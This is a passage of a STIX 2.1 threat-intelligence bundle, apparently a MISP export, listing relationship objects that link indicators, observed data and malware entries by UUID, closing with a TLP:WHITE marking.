"relationship_type": "describes",
|
||
|
"source_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
|
||
|
"target_ref": "x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--778739ce-7d62-407e-b7d7-47738f1f20a7",
|
||
|
"created": "2024-09-19T06:42:41.000Z",
|
||
|
"modified": "2024-09-19T06:42:41.000Z",
|
||
|
"relationship_type": "describes",
|
||
|
"source_ref": "x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
|
||
|
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--e330e7a8-ca8d-4c09-a08d-995897dd83a5",
|
||
|
"created": "2024-09-19T07:27:51.000Z",
|
||
|
"modified": "2024-09-19T07:27:51.000Z",
|
||
|
"relationship_type": "references",
|
||
|
"source_ref": "x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
|
||
|
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--2e94d260-5c02-44f7-b254-ae11af7a2fb9",
|
||
|
"created": "2024-09-19T07:27:30.000Z",
|
||
|
"modified": "2024-09-19T07:27:30.000Z",
|
||
|
"relationship_type": "describes",
|
||
|
"source_ref": "x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
|
||
|
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--cd29672f-ec6e-4c10-964e-15f32d57a4cd",
|
||
|
"created": "2024-09-19T07:26:21.000Z",
|
||
|
"modified": "2024-09-19T07:26:21.000Z",
|
||
|
"relationship_type": "executes",
|
||
|
"source_ref": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
|
||
|
"target_ref": "malware--7b88da77-5001-4565-926e-965d55319a24"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--ea68661a-18d8-4e1e-ad7f-072952fb7b1b",
|
||
|
"created": "2024-09-19T07:26:47.000Z",
|
||
|
"modified": "2024-09-19T07:26:47.000Z",
|
||
|
"relationship_type": "executes",
|
||
|
"source_ref": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
|
||
|
"target_ref": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--b21581ce-31d2-422c-b108-c7c3ee1c94c9",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"relationship_type": "signed-by",
|
||
|
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"target_ref": "observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--16799923-4654-457e-8d30-1d5975e69155",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"relationship_type": "signed-by",
|
||
|
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"target_ref": "observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--09f6a1c4-3452-443e-a223-ab9687823be4",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"relationship_type": "signed-by",
|
||
|
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"target_ref": "x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--0bbed3e1-5677-41b6-b35a-75adfa959e7e",
|
||
|
"created": "2024-09-19T06:40:10.000Z",
|
||
|
"modified": "2024-09-19T06:40:10.000Z",
|
||
|
"relationship_type": "connects-to",
|
||
|
"source_ref": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"target_ref": "indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725"
|
||
|
},
|
||
|
{
|
||
|
"type": "marking-definition",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
||
|
"created": "2017-01-20T00:00:00.000Z",
|
||
|
"definition_type": "tlp",
|
||
|
"name": "TLP:WHITE",
|
||
|
"definition": {
|
||
|
"tlp": "white"
|
||
|
}
|
||
|
}
|
||
|
]
|
||
|
}
|